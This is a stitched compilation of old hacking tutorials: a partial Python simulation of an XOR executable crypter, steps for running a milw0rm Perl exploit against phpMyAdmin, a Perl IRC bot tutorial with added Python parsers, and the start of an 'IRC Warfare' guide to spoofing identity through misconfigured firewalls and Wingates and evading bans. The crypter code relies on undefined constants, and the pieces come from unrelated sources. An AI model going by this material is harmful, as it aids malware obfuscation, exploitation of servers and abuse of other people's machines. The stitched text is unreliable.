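TEXT_SIZE = 0x4000         # constructed: .text spans 401000 - 405000

# Constructed stand-in for an executable: 0x5000 bytes of repeating values.
ORIGINAL_IMAGE = bytes(range(256)) * (0x5000 // 256)


def xor_block(data, key):
    """XOR every byte with key. One call crypts, a second call restores (XOR is its own inverse)."""
    return bytes(b ^ key for b in data)


def va_to_file_offset(va):
    """Map a virtual address inside .text to its file offset (constructed layout, no alignment gap)."""
    return va - TEXT_VA + TEXT_FILE_OFFSET


def crypt_image(image):
    """Build the crypted executable: XOR the code at OEP and point the entry point at the stub.

    Returns (crypted_image, new_entry_point). The stub bytes themselves are not
    modelled; only the region it operates on and the entry-point swap.
    """
    img = bytearray(image)
    start = va_to_file_offset(OEP)
    img[start:start + CRYPTED_LEN] = xor_block(img[start:start + CRYPTED_LEN], KEY)
    return bytes(img), STUB_VA


def run_decoder_stub(crypted_image):
    """Do in a memory copy what the asm loop does: XOR CRYPTED_LEN bytes from OEP with KEY.

    Returns the memory image as it looks when execution reaches the final
    'jmp OEP', i.e. the point where the text says to dump .text.
    """
    mem = bytearray(crypted_image)
    addr = va_to_file_offset(OEP)          # MOV EAX, 401048
    for _ in range(CRYPTED_LEN):           # MOV ECX, 2D86 / DEC ECX / JNZ
        mem[addr] ^= KEY                   # XOR BYTE PTR [EAX], 0F
        addr += 1                          # INC EAX
    return bytes(mem)


def dump_text_section(memory_image):
    """The LordPE step: grab the 401000 - 405000 range from memory."""
    return memory_image[TEXT_FILE_OFFSET:TEXT_FILE_OFFSET + TEXT_SIZE]


def restore_from_dump(crypted_image, text_dump, original_entry_point):
    """The WinHex step: write the decrypted .text over the crypted one and reset the entry point.

    Returns (restored_image, entry_point).
    """
    img = bytearray(crypted_image)
    img[TEXT_FILE_OFFSET:TEXT_FILE_OFFSET + len(text_dump)] = text_dump
    return bytes(img), original_entry_point


def restoration_round_trip():
    """Crypt, 'run' the stub, dump, restore; True if the result equals the original."""
    crypted, ep = crypt_image(ORIGINAL_IMAGE)
    memory = run_decoder_stub(crypted)
    restored, restored_ep = restore_from_dump(crypted, dump_text_section(memory), OEP)
    return restored == ORIGINAL_IMAGE and restored_ep == OEP and ep == STUB_VA


if __name__ == "__main__":
    print("restoration round trip ok:", restoration_round_trip())
```

The round trip works only because the stub touches nothing outside the 0x2D86-byte region and the section is stored uncompressed, which is exactly the precondition stated above.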

Anyway, this was a fun bit to design and figure out how to do. Hopefully this takes some of the "magic" out of how executable crypters work and should be enough to help someone else along.

I also caved in and wrote a quick point-and-click utility to integrate this crypter stub into arbitrary executables. You can snag the app plus VB source here (it also has a nice set of classes for PE header manipulation).


Source: http://sandsprite.com/CodeStuff/Build_your_own_executable_crypter.html

Sunday, July 6, 2008

Compiling Perl coded exploits

At first we were all like:

what the hell is: #!/usr/bin/perl ??

Example:

Code:
http://www.milw0rm.com/id.php?id=1244

I'm gonna explain how you make this work.
———————————————————————
1: Get ActivePerl:

Code:
http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.7.813-MSWin32-x86-148120.msi

Perl = .pl. You can't make .pl files work without ActivePerl. Well, you can, but then you have to use a server with Perl; most of them have that, but that's not what I'm going to show you.
————————————————————————————-
2: After downloading/installing ActivePerl it's time to begin.

Copy all the text you got in here to WordPad, like this:

Code:
http://www.milw0rm.com/id.php?id=1244

Now you have to turn the WordPad file into a Perl file (.pl):

File / Save as /

(yeah, it's Dutch >.<)

filename: phpmyadmin.pl
save as type: all files

Save it on your C:\, just in the root.

Got it? Saved it? Now it's a Perl file.

Next step
—————————————————————————–
3. Now you have to run the file. How? Read!

Open MS-DOS. How?: START / RUN / and type in cmd

Now you're in MS-DOS.

Now type:
cd c:\

Now you're in C:. Type:

phpmyadmin.pl
and it loads up the Perl file.

———————————————————————————–
Now fill in the HOST/DIR/FILE and you're done
———————————————————————————–


Bare Bones IRC Bot In Perl

by b0iler : b0iler@hotmail.com : last update July 26th 2002
Written for: http://b0iler.eyeonsecurity.net - my site full of other cool tutorials


This is a short guide to creating your own perl bot which will work on irc. I will not
cover all the different modules and ways to connect to irc and issue commands. This
will only cover connecting with IO::Socket and using raw irc commands. I feel you learn
the most this way and have a lot of control over what is happening.

IRC experience is helpful, but I’ll take things slow enough so that an absolute beginner
can understand what is taking place. This will also help those with a little knowledge
fully understand the irc protocol. Although I am no irc expert, after creating this
bot I did learn a few tricks.

We start off by getting a connection underway:

#!/usr/bin/perl
use IO::Socket;

$sock = IO::Socket::INET->new(
    PeerAddr => 'irc.undernet.org',
    PeerPort => 6667,
    Proto => 'tcp' ) or die "could not make the connection";

You can use any irc server and any port (commonly used ports are 6667-7000), so long
as they are valid. If you have problems try to find a different server on that
network. To make things easier you can make the PeerAddr a variable which is
specified by an argument from the command line. Or perhaps map out all the servers
on the network and make an array from them, connecting to random ones and using the
best connection. There are many possibilities, each works best for certain
situations. We’ll stick to the simple hard coded address and port.

Now we have a connection to the server. We still need to get connected/logged in to
the ircd. Anything we send to or receive from the server will go through $sock. So
let’s see what the server is sending us after we make a connection.

while($line = <$sock>){
    print "$line\n";
}

We will see that the server prints out some lines. Each line will have a numeric code
attached to it. This will really help to tell the bot when to start and end
routines. The key here is the line with ‘NOTICE AUTH’ in it. This is when we need
to login to the irc server. To do this we send

NICK bots_nick
USER bots_ident 0 0 :bots name

With a line break after the bots_nick and a line break at the end. So in the while loop
we will add something like this:

while($line = <$sock>){
    print $line;
    if($line =~ /(NOTICE AUTH).*(checking ident)/i){
        print $sock "NICK b0ilersbot\nUSER bot 0 0 :just a bot\n";
        last;
    }
}

Now we are done with the login process. If you are having any problems try to read up
on the irc protocol and how to login to it with telnet. Raven from www.securitywriters.org
has written a decent tutorial on the subject, look for it.

Some servers will ask for a ping to make sure the client is active. This is only done
on some servers and is a common pitfall for many bots which don’t support this kind of
login procedure. To handle this we will check if the server wants us to ping it.
The server will ask for a ping before it asks about nickserv registration/identification,
so we will stop this loop after it mentions nickserv. This is what those numbers in
the last if statement are for, the 376|422. The way to identify to nickserv is like this

NICKSERV :identify nick_password

this is just a simple irc command. The command is ‘NICKSERV’ and the arguments are
‘identify nick_password’ where nick_password is the actual password for this nick. The
line ends in a line break and all irc commands are in upper case. When there is a :
before something it means it is a multiple word argument (has spaces in it). This is
how we will handle the possible ping and the nickserv identification.

while($line = <$sock>){
    print $line;
    #use next line if the server asks for a ping
    if($line =~ /^PING/){
        print $sock "PONG :" . (split(/ :/, $line))[1];
    }
    if($line =~ /(376|422)/i){
        print $sock "NICKSERV :identify nick_password\n";
        last;
    }
}
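The login sequence described above (NOTICE AUTH, then NICK/USER, an optional PING that must be answered with PONG, then the 376/422 end-of-MOTD numerics that signal it is time to identify to NickServ) as an added Python example; this is not code from the tutorial. It is driven by a constructed server transcript rather than a socket, the nick and password are placeholders, and it checks the numeric in the command field of the line rather than anywhere in it, so a hostname or ping cookie that happens to contain "376" cannot trigger the identify step. The join (and the sleep the tutorial puts before it) is left to the caller.

```python
# Added example, not part of the b0iler tutorial: the login sequence as a
# small state machine, driven by a constructed server transcript instead of a
# socket. The nick and password are placeholders; the transcript lines are
# modelled on the ones the tutorial describes (NOTICE AUTH, PING, 376/422).

NICK = "b0ilersbot"              # placeholder bot nickname
NICK_PASSWORD = "nick_password"  # placeholder, as in the tutorial text


def command_of(line):
    """Return the command or numeric token of a raw IRC line.

    Server lines normally start with ':prefix', which puts the command in the
    second token; PING and NOTICE AUTH lines carry no prefix, so it is the first.
    """
    parts = line.rstrip("\r\n").split(" ")
    if parts[0].startswith(":") and len(parts) > 1:
        return parts[1]
    return parts[0]


def trailing(line):
    """Return the multi-word argument after the first ' :' (empty if there is none)."""
    _, sep, tail = line.rstrip("\r\n").partition(" :")
    return tail if sep else ""


def handle_login_line(state, line):
    """Advance the login state machine by one server line.

    Returns (new_state, replies): replies are the raw lines the bot must send,
    each ending in CRLF as the protocol expects. States: 'connected' (socket
    open, nothing sent), 'registering' (NICK/USER sent), 'identified' (end of
    MOTD seen, NickServ identify sent).
    """
    cmd = command_of(line)
    replies = []
    if cmd == "PING":
        # Some servers demand a PONG before they complete registration;
        # the reply echoes the ping's argument.
        replies.append("PONG :%s\r\n" % trailing(line))
    if state == "connected" and cmd == "NOTICE" and "checking ident" in line.lower():
        replies.append("NICK %s\r\n" % NICK)
        replies.append("USER bot 0 0 :just a bot\r\n")
        state = "registering"
    elif state == "registering" and cmd in ("376", "422"):
        # 376 = end of MOTD, 422 = no MOTD: registration is complete. Checking the
        # command field avoids matching '376' inside a hostname or ping cookie.
        replies.append("NICKSERV :identify %s\r\n" % NICK_PASSWORD)
        state = "identified"
    return state, replies


def run_login(server_lines):
    """Feed a transcript through the state machine; return (final_state, lines_sent)."""
    state, sent = "connected", []
    for line in server_lines:
        state, replies = handle_login_line(state, line)
        sent.extend(replies)
        if state == "identified":
            break
    return state, sent


# Constructed transcript of what a server might send during login.
SERVER_TRANSCRIPT = [
    "NOTICE AUTH :*** Looking up your hostname\r\n",
    "NOTICE AUTH :*** Checking Ident\r\n",
    "PING :E3AA3478\r\n",
    ":localhost 001 b0ilersbot :Welcome to the network b0ilersbot\r\n",
    ":localhost 422 b0ilersbot :MOTD File is missing\r\n",
]

if __name__ == "__main__":
    final_state, sent = run_login(SERVER_TRANSCRIPT)
    print(final_state)
    for reply in sent:
        print(repr(reply))
```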

If you want to have a registration code you can find this out on your own.. or do what I
do and register the nick with a normal irc client. This way we only need the bot to
identify.

When you create your bot you can customize it however you want. Most of my bots have
a little more AI than this tutorial shows. This bot will be pretty straightforward
and doesn’t make many decisions. It just connects and does something.

I like to make the bot sleep for a few seconds just to let the connection catch up.
I am on a 56k and things can go slow sometimes. A few times without the sleep the bot
has joined channels before the nickserv identification is complete, this can be a pain
in the neck if the bot needs a usermode or other circumstances which require the nick
to be identified (such as other bots, +R channel mode, or trust issues with users).

After it sleeps it will join the channel. You will see that the server prints out a lot
of information about the channel when you join. You can save this information in
variables to allow the bot to make many decisions. Again, this is a simple bot and
won’t be aware of its environment or be dynamic in any way. But you could for example
turn on/off colors by what channel modes are set or who is in the channel (some people
really hate colors). This is the last bit of the login process, after this the bot
can actually do something.

sleep 3;
print $sock "JOIN #channel\n";

Notice there is no : before #channel. This is because it does not have any spaces in it.
And the JOIN command is in all caps. For a full list of commands try reading a tutorial
on the IRC protocol. I don’t even cover the basics here, there are tons of useful
commands to know.

Now we are joining the channel. There is nothing else to do besides read the messages
users send to the channel and respond to them. But in order to read the messages we need
to parse them so they make sense. The format of a priv_msg is as follows:

:nick!ident@hostname.com PRIVMSG #channel :the line of text

I like to separate them into the following variables to make things easier to keep track of.

:$nick!$hostname $type $channel :$text

in this example here is the values of the variables:

$nick = nick
$hostname = ident
$type = priv_msg
$channel = #channel
$text = the line of text

So we are going to need to parse what is sent from the server into usable data. This is
how we’ll do it. There is only one twist here, and that is in case the server sends a
ping. They do this quite often to check and see if you are still connected. If we don’t
reply to the pings then we will get disconnected. When the server sends a ping you
must reply with a PONG and the same characters the ping had. So this is how we will send it

while ($line = <$sock>) {
    ($command, $text) = split(/ :/, $line); #$text is the stuff from the ping or the text from the server

    if ($command eq 'PING'){
        #while there is a line break - many different ways to do this
        while ( (index($text,"\r") >= 0) || (index($text,"\n") >= 0) ){ chop($text); }
        print $sock "PONG $text\n";
        next;
    }
    #done with ping handling

    ($nick,$type,$channel) = split(/ /, $line); #split by spaces

    ($nick,$hostname) = split(/!/, $nick); #split by ! to get nick and hostname separate

    $nick =~ s/://; #remove :'s
    $text =~ s/://;

    #get rid of all line breaks. Again, many different ways of doing this.
    $/ = "\r\n";
    while($text =~ m#$/$#){ chomp($text); }

    #end of parsing, now for actions
}

ok. That was a rather large chunk of code and some parts were rather confusing. Most of
it is just getting rid of what we don’t want and separating what we do want into variables.
The next bit is just for looks. We print out what is said as if this is a normal irc client.

if($channel eq '#channel'){
    print "<$nick> $text";
}

The $channel check is needed in case people priv_msg or notice you things. This can be a
problem when dealing with bots which need to be secure or can cause large headaches when
things go wrong. I’ll leave dealing with multiple channels to you. But to send Notices
you simply do: print $sock "NOTICE nick :the line of text here\n"; and to send a
priv_msg you do: print $sock "PRIVMSG nick :the line of text here\n";

Now the bot structure is done. Everything required is done, the only thing left to do
is customize your bot to have it do what you want it to do. This can be almost any sort
of task imaginable. Simply parse the $text, $nick and other variables we created to
have the bot make decisions on what to do.

Here is the final bot in whole. I added one bit just to prove that the bot works:

#!/usr/bin/perl
use IO::Socket;

$sock = IO::Socket::INET->new(
    PeerAddr => 'irc.undernet.org',
    PeerPort => 6667,
    Proto => 'tcp' ) or die "could not make the connection";

while($line = <$sock>){
    print $line;
    if($line =~ /(NOTICE AUTH).*(checking ident)/i){
        print $sock "NICK b0ilersbot\nUSER bot 0 0 :just a bot\n";
        last;
    }
}

while($line = <$sock>){
    print $line;
    #use next line if the server asks for a ping
    if($line =~ /^PING/){
        print $sock "PONG :" . (split(/ :/, $line))[1];
    }
    if($line =~ /(376|422)/i){
        print $sock "NICKSERV :identify nick_password\n";
        last;
    }
}

sleep 3;
print $sock "JOIN #channel\n";

while ($line = <$sock>) {
    ($command, $text) = split(/ :/, $line); #$text is the stuff from the ping or the text from the server

    if ($command eq 'PING'){
        #while there is a line break - many different ways to do this
        while ( (index($text,"\r") >= 0) || (index($text,"\n") >= 0) ){ chop($text); }
        print $sock "PONG $text\n";
        next;
    }
    #done with ping handling

    ($nick,$type,$channel) = split(/ /, $line); #split by spaces

    ($nick,$hostname) = split(/!/, $nick); #split by ! to get nick and hostname separate

    $nick =~ s/://; #remove :'s
    $text =~ s/://;

    #get rid of all line breaks. Again, many different ways of doing this.
    $/ = "\r\n";
    while($text =~ m#$/$#){ chomp($text); }

    if($channel eq '#channel'){
        print "<$nick> $text";

        if($text =~ /hi b0ilerbot/gi){
            print $sock "PRIVMSG #channel :hi $nick\n";
        }
    }
}

Not very complicated once you look at each part of it. But finding out things for yourself
is the real fun of creating a bot. Much trial and error is involved in perfecting the bot,
adding security and function can be a lot of fun. I would like to stress the security of irc bots.
They are in the most hostile environment known to the net and one security mistake and your
bot could be used to execute commands on your box. I have found 4 irc perl bots vulnerable
to remote command execution, don’t let me find yours vulnerable as well! Read all of the perl
security related tutorials at http://b0iler.eyeonsecurity.net/tutorials/
Don’t let this discourage you from coding your own bot, it’s a great learning experience and as long as you
are careful you should be fairly safe. I would love to hear what kind of bots you come up with. The bots
I have created include:

quote bot - a bot which has many features that deal with irc quotes. It reads off funny/witty things
people have said while chatting in my channels. It also has some more advanced features such as listing
off all the users in the channel who have a quote and an admin feature which allows me to add quotes while
the bot is running.

quiz bot - A bot which quizzes the channel users. I used this while studying for networking. This bot is
great when the channel is dead or to start up a conversation with others. I learned a lot from this bot.

poker bot - A bot which plays poker. I started to make a ucker (sp?) bot, but I lost motivation when the
other people who wanted to play quit going on irc.

channel bot - A bot which enforces the channel rules. It warns, kicks, and kick bans users for breaking the
rules. It voices, half ops, and ops identified users and keeps stats of channel activity. Good for preventing
channel takeovers.

The reason for creating this text was because I remember the stress I had finding info on this subject when
I first created the bot. I have since read a few crappy papers on irc bots, but nothing which would be very
helpful.

[-----]

The IRC Warfare Tutorial

Written by The Cyber God
http://blacksun.box.sk

Version 1.1, 24/9/99
Updated 7/20/01 by Mikkkeee
Converted to HTML by Mikkkeee

[Editor Notes]

Please send comments, questions and feedback to talrun@actcom.co.il
You can always visit us at http://blacksun.box.sk/

[Disclaimer]

We will not help you actualize the things that you will learn here.
The information here is for educational purposes only (for learning how the attacks are done and how to prevent them).
We are not responsible in any way for any damage that might happen to you. This includes software damages and law issues.

[Table Of Contents]

1. What is IRC?
2. An introduction to the way that IRC works
3. Some notes on different IRC networks and their daemon software
4. Why IRC wars started
5. What do the others know about me?
6. How to spoof / hide your identity on the IRC
7. Bans and how to bypass them
8. I don’t like your nickname… / Getting a user off the IRC
9. Can I get caught and will I?
10. What are netsplits and how can they help me?
11. Channel Takeovers
12. How To Completely Ruin A Channel
13. Some expansion about RAW sessions
14. Faking /ctcp replies
15. How to spoof via https proxies
16. War Scripts
17. Editorial - IRC wars, another perspective
18. Some interesting articles by Packet
19. Bibliography


[What is IRC?]

IRC stands for “Internet Relay Chat”. Jarkko Oikarinen originally wrote it in 1988. Since starting in Finland, it has been used in over 60 countries around the world. It was designed as a replacement for the “talk” program but has become much, much more than that. IRC is a multi-user chat system, where people meet on “channels” (rooms, virtual places, usually with a certain topic of conversation) to talk in groups, or privately. There is no restriction to the number of people that can participate in a given discussion or the number of channels that can be formed on IRC.

[An introduction to the way IRC works]

All the communications in the world of IRC are done through the server. (This does not include the DCC (Direct Client Communication) protocol.)

When you connect to a server, you send it 2 commands: NICK & USER. These commands are used to identify you on the IRC. Here is the format of the commands:

NICK nickname - Sets your nickname

USER username host server :real name - Sets your userid and real name. Host is your host and server is the server you are connecting to.

For example, to open a raw IRC session you can telnet to an IRC server on port 6667 or 7000 (the standard ports). Here is an example of telneting to my localhost (note: the lines beginning with * have been written by me. The rest are the output I got from the server):

* nick ^TCG^

NOTICE ^TCG^ :*** If you are having problems connecting due to ping timeouts, please type /notice E3AA3478 nospoof now.
PING :E3AA3478

* user ^TCG^ 127.0.0.1 localhost :The Cyber God

:localhost 001 ^TCG^ :Welcome to the DALnet IRC Network ^TCG^!~tcg@thegod.actcom.co.il
:localhost 002 ^TCG^ :Your host is localhost[thegod.actcom.co.il], running version dal4.6.7.DreamForge.win32
:localhost 003 ^TCG^ :This server was created Fri Jul 24 07:48:52 1998
:localhost 004 ^TCG^ localhost dal4.6.7.DreamForge.win32 oiwsghOkcfrRaAb biklmnopstvR
:localhost 005 ^TCG^ NOQUIT TOKEN WATCH=128 SAFELIST :are available on this server
:localhost 251 ^TCG^ :There are 0 users and 0 invisible on 1 servers
:localhost 253 ^TCG^ 4 :unknown connection(s)
:localhost 255 ^TCG^ :I have 0 clients and 0 servers
:localhost 265 ^TCG^ :Current local users: 0 Max: 0
:localhost 266 ^TCG^ :Current global users: 0 Max: 0
:localhost 422 ^TCG^ :MOTD File is missing
:^TCG^ MODE ^TCG^ :+iw

ok

As you can see, the second parameter of the USER command includes my IP. You might be thinking right now that you could enter any IP you want and fake your IP. Well you are wrong. On really old versions of the IRC daemon (those that were used in Efnet), you WERE able to spoof your IP. But today there are 2 types of antispoof patches: the one that doesn’t care about the IP you entered and connects you using your real IP (which it gets from the socket) and the other one just doesn’t allow you to connect to the server until you give your real IP address.

The first method of anti-spoofing is used most in the server version of DALnet and the second is used most by EliteIRCD (which is based on DALnet) and the servers that are based on it.

Now, if it all goes ok then you just opened a raw session to IRC!

All the data transferred to the user (private messages/notices and channel events) is transferred from the server. If the user that sent you a message is on a DIFFERENT server than you (but NOT a different network) the message “moves” from server to server until it reaches your server and you. To send someone a message in our raw IRC session type: ‘PRIVMSG nick :message’ (without the quotes) where nick is the target nickname and message is the message (you must include a : before the message).

When a message moves from server to server it looks like this:

:SenderNick PRIVMSG nick :message

All the IRC commands move from server to server like this. For example, when someone uses the NICK command ALL the servers get a notice about it.


[Some notes on different IRC networks and their daemon software]

Different IRC networks have different IRC daemons. It is important to know the features / limits of the server your network uses. For example, OLD Efnet servers don’t know the +b channel mode (ban someone). When trying to start IRC wars you need to know what the limitations of the server are. Does it have services, and if so do they have a bug that can crash them? Can you obtain Channel Operator in a net-split (we’ll get to that)? And so on… During the rest of this tutorial we will discuss different daemon software and bugs, as well as different ways to “get in”.

[Why IRC wars started?]

Generally, IRC wars started on the IRC network Efnet. In this IRC network you can’t register your nickname so ANYONE can use it. If for example someone logged in to this IRC network (by the way, did you know that it is the first IRC network ever (!)) and he saw that his nick was taken, he probably said something like “How Rude?!” or “Mother-F*cker” or anything else. Then he started thinking about ways to get this user off the server. Users started to try many different things on each other and that’s pretty much how IRC wars started. Today, users might start IRC wars “just for fun”, or for taking over channels they don’t like or kicking off users they don’t like.

[What do the others know about me?]

OK people! This is actually the first important thing about the IRC wars. Before starting out you need to know what others can find out about you and what you can find out about them.

If you are not connected through a BNC, firewall or a shell (we’ll get to this neat stuff later), that is, if you are connected directly to the IRC, using a dial-up for example, users can first of all know your IP. Newbies might say right now, ok… well…. So he knows my IP… who gives a shit anyway?

Well if you said this you are wrong. Let’s take a look at my host (resolved IP) for example:

P34.haifa2.actcom.co.il
|   |      |      |_ You can see that my ISP is in Israel, and so am I (unless I’m dialing to foreign ISPs just to cover my identity, which is a thing people don’t do because of… financial issues).
|   |      |_ You can see that my ISP (Internet Service Provider) is Actcom
|   |_ You can see that I am from Haifa :).
|_ My modem number at the ISP’s office.

See how many things the host gave you?

1) My ISP
2) My city
3) My country

Now you can also know that if my ISP address is actcom.co.il you can send complaints about me to abuse@actcom.co.il for example, give them my IP and tell them what I did to you and they will do the rest.

That is what users know about you. Some times you will only see numbers like 19.114.47.1 and not the host. That is because the server failed to resolve your hostname. To resolve it you can download a program called ‘nslookup’ from somewhere (note: nslookup comes with all Unix systems), give it the IP and it will try to resolve it. Also see the entry ‘DNS Servers’ in the Newbies Corner.


Now, for those who don’t know, you can get the IP/host by “whoising” the user.

To do a whois on a user in mIRC, BitchX, IRCii, Pirch and some other known IRC clients all you need to do is type /whois nickname

To whois someone in our raw connection (the one I taught you how to establish at the beginning) type ‘whois nickname’ (without the quotes)

Here is what I get when I whois myself in the raw connection:

whois ^TCG^

:localhost 311 ^TCG^ ^TCG^ ~TCG thegod.actcom.co.il * :The Cyber God
:localhost 312 ^TCG^ ^TCG^ localhost :test server
:localhost 317 ^TCG^ ^TCG^ 9 932030074 :seconds idle, signon time
:localhost 318 ^TCG^ ^TCG^ :End of /WHOIS list.

Ok, before I explain what you got here, here is the format:

Format: :server-name raw-number sender target data

Server-name is the server that gives you the data.
Raw-number is the ID of the data you got (it is used to determine what data you are getting).
Sender: the sender’s nickname (you!!).
Target: the target (the nick you are whoising).
Data: the data.

Now here is an explanation of all 4 lines.

In the first one you see the user-name and the host of the user; you also see his real name:

~TCG thegod.actcom.co.il * :The Cyber God
|    |                      |_ The user’s real name (you can fake this :))
|    |_ The user host or IP
|_ The username (set by IdentD, will be explained later; when it carries a ‘~’ you see that the IdentD is NOT running and the Ident (username) might be fake).

The second line:

localhost :test server
|          |_ Comment about the server (set by the server admin)
|_ The server that the user is connected to

Third line:

9 932030074 :seconds idle, signon time
|  |_ When the user signed on
|_ How many seconds he has been idle

Last line:

:End of /WHOIS list.
|_ Shows you that there is no more data.
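The reply format described here (:server-name raw-number sender target data) and the PRIVMSG lines the b0iler bot tutorial earlier on this page splits by hand are the same wire format, so one parser serves both. The following is an added Python example, not code from either tutorial; the sample lines are copied from the text, nothing is sent over a network, and the whois summary function assumes the 311/312/317/318 layouts exactly as shown above.

```python
# Added example, not part of either tutorial: a parser for the raw line format
# described here (:server-name raw-number sender target data) and for the
# PRIVMSG lines the b0iler bot tutorial above splits by hand. The sample lines
# are taken from the text; nothing is sent over the network.


def parse_irc_line(line):
    """Split a raw IRC line into prefix, command, params and trailing text.

    Format: [':' prefix ' '] command {' ' param} [' :' trailing]. The trailing
    argument may contain spaces, so it is cut off first; everything before it
    is a plain whitespace split. Returns a dict; prefix/trailing are None when absent.
    """
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trail = line.partition(" :")
    tokens = head.split()
    if not tokens:
        raise ValueError("IRC line has no command")
    return {
        "prefix": prefix,
        "command": tokens[0],
        "params": tokens[1:],
        "trailing": trail if sep else None,
    }


def split_prefix(prefix):
    """Split 'nick!user@host' into (nick, user, host); a bare server name gives (name, None, None)."""
    if prefix is None:
        return (None, None, None)
    nick, bang, rest = prefix.partition("!")
    user, at, host = rest.partition("@")
    return (nick, user if bang else None, host if at else None)


def summarize_whois(lines):
    """Fold the WHOIS numeric replies shown above (311, 312, 317, 318) into one record.

    The username in 311 carries a leading '~' when the server could not verify
    it through identd, which the text explains; that flag is recorded separately.
    """
    info = {}
    for line in lines:
        msg = parse_irc_line(line)
        p = msg["params"]          # p[0] is always the recipient of the reply
        if msg["command"] == "311":          # <me> <nick> <user> <host> * :<real name>
            info["nick"], info["host"] = p[1], p[3]
            info["ident_verified"] = not p[2].startswith("~")
            info["user"] = p[2].lstrip("~")
            info["realname"] = msg["trailing"]
        elif msg["command"] == "312":        # <me> <nick> <server> :<server info>
            info["server"] = p[2]
        elif msg["command"] == "317":        # <me> <nick> <idle> <signon> :seconds idle, signon time
            info["idle_seconds"], info["signon"] = int(p[2]), int(p[3])
        elif msg["command"] == "318":        # end of list
            break
    return info


# Sample lines, copied from the tutorials above.
PRIVMSG_LINE = ":nick!ident@hostname.com PRIVMSG #channel :the line of text\r\n"
WHOIS_REPLIES = [
    ":localhost 311 ^TCG^ ^TCG^ ~TCG thegod.actcom.co.il * :The Cyber God\r\n",
    ":localhost 312 ^TCG^ ^TCG^ localhost :test server\r\n",
    ":localhost 317 ^TCG^ ^TCG^ 9 932030074 :seconds idle, signon time\r\n",
    ":localhost 318 ^TCG^ ^TCG^ :End of /WHOIS list.\r\n",
]

if __name__ == "__main__":
    print(parse_irc_line(PRIVMSG_LINE))
    print(summarize_whois(WHOIS_REPLIES))
```

Cutting the trailing argument at the first " :" before splitting on spaces is what makes the parser safe for message text that itself contains spaces or colons; splitting the whole line on spaces, as the bot tutorial does, breaks on any multi-word text.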

Also, when users know your IP they can start almost any Denial of Service (DoS) attack on your host like WinNuke (Arggg… Lame Lame Lame!!!) or a lovely ping flood that will chew up all of your bandwidth, depending on the attacker’s bandwidth (for more info and more sophisticated DoS attacks, see the DoS tutorial at blacksun.box.sk).

[How to spoof / hide your identity on the IRC]

After seeing what users can find out about you, it is time to learn how to hide your identity.

There is no easy and lame way to do this. Here are the most known ways: firewall, WinGate and a bouncer, aka (also known as) BNC.

We will start from the firewall.

The firewall we are talking about is software that runs on some machine and is used to filter incoming packets (packets that arrive to the machine which is running the firewall) and outgoing packets (packets that are sent from the machine which is running the firewall). Some firewalls are not configured very well and allow anyone to connect to them. The hard part is to find a working one that will allow you to use it to connect through it, and once you are connected, using it so users that will whois you or dns you will see the firewall’s IP! If, for example, there is a misconfigured firewall on the host firewall.someone.com, you can use it in mIRC, for example, by starting the mIRC program (I use the newest version 5.6, go download it at www.mirc.co.uk) and:

1. Click on the Files menu, then Options.
2. On the topmost label of the tree where you can see ‘Connect’, if you see a ‘+’ next to it click it. If you see a ‘-’ go to the next step.
3. Click on the sub-item Firewall (duh…)
4. Be sure the ‘Use SOCKS firewall’ checkbox is marked (has an ‘X’ in it).
5. In the Hostname field, write the IP / hostname of the firewall. For example let’s use firewall.someone.com
6. Leave the USER ID and PASSWORD empty, and make sure the port is 1080.
7. Click OK.

Now, next time you type /server … to connect to the IRC server the connection will be relayed through the firewall, so if someone whoises you he would see something like this:

:localhost 311 ^TCG^ ^TCG^ ~TCG firewall.someone.com * :The Cyber God
:localhost 312 ^TCG^ ^TCG^ localhost :test server
:localhost 317 ^TCG^ ^TCG^ 9 932030074 :seconds idle, signon time
:localhost 318 ^TCG^ ^TCG^ :End of /WHOIS list.

You can see that my host is NO LONGER thegod.actcom.co.il, instead it is now firewall.someone.com!!

Now I am protected. You might be asking right now where to get the firewall hosts. One idea is to go asking your friends. Another is going to Altavista (www.altavista.com) and searching for “firewall AND list” and stuff like that.

Another way of spoofing your IP is a WinGate. WinGate is software for Windows that is used to let several computers that are connected through a local network of some sort use one computer’s Internet access. It also allows you to fake your IP _EXACTLY_ the same way. After installing WinGate, anyone will be able to use it if you don’t configure it well (I personally recommend using SyGate instead). To find Wingate addresses you can ask your friends, run a Wingate scanner that will scan whole subnets for Wingates or look for lists on the web.

Note: newer versions of the IRC daemons will automatically check for an open Wingate or a firewall, and if they detect one they will kill your session and might even K-Line (ban the host from using the server/network) the host as well.

Now, on to the Bouncer (aka BNC) spoofing.

A bouncer is software that runs on Unix computers. If, for example, there is a BNC on bnc.shell.com on port 1234, you can connect to it by typing:

/server bnc.shell.com 1234

After that you should be getting something like this:

-BNC- Please type your password via /quote pass

Crap… You need a password. If you know the password you have no problem. Just type ‘/quote pass password’ (without the quotes), where ‘password’ is your password.

If you don’t know the password you need to ask the guy that gave you the BNC (or you could always hack the server… ;) but this tutorial is about IRC warfare, not hacking servers and getting passwords). You should also ask him if it (the BNC) has vhosts. Vhosts are multiple IPs and hostnames for the same BNC. If it has vhosts, you can set your active host by typing ‘/quote vip the.host.name.here’ (as you should be able to figure by now, it is done without the quotes).

After this you type ‘/conn server’. For example /conn irc.dal.net will connect you to irc.dal.net with the bouncer’s host.

Note: unlike firewalls and badly configured Wingates, the server cannot detect a BNC, so there is no chance you will be banned for using it.

[Bans and how to bypass them]

Channel Operators might ban you after you have done something in their channel that made them angry :( .

To bypass a ban you first need to know the ban type. There are a few ban types:

1. nick!*@* - Bans you by your nickname. All you need to do is change your nick (by typing /nick newnick, or in a raw session NICK newnick) and you can re-enter the channel.

2. *!user@* - Bans you by your Ident (UserID). If your computer is not running an IdentD daemon (a Win9x box with mIRC, for example) you can easily change your Ident by clicking on the File menu, selecting Options, opening the ‘Connect’ sub-tree, clicking the IdentD label and changing the User ID. If you are on a Unix / Linux machine that is already running an IdentD daemon, you can’t change it because it automatically sets your ident username to your login name. To change this you need to log on to the IRC through a Bouncer, because bouncers fake your IdentD.

3. *!*@host - You are banned by your IP / host. All you need to do is connect through a firewall or a Wingate.

Sometimes the bans are more complex, like ^TCG^!*@*.actcom.co.il. This ban will prevent anyone named ^TCG^ with a host that ends with .actcom.co.il from joining.

If you are interested, here is the format:

Nick!user@host
  Nick - The user’s nickname. It might also contain wildcards like *T*C*G*, which will prevent anyone with the letters T, C and G (in this order) in their nick from joining the channel.
